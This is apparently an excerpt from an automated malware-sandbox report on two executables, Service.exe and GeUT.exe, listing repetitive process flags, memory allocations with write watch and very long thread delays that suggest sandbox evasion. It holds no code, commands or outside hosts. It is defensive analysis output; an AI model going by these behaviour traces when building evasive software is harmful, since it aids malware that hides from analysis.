Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 25D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 45D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4400000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 48A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 25A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 45A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4F70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2980000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 5170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 1710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 4DB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 3080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 12F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 27D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 24F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 4620000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 5080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 28A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: EE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 2C80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 3240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe	Memory allocated: 5240000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe	Thread delayed: delay time: 922337203685477
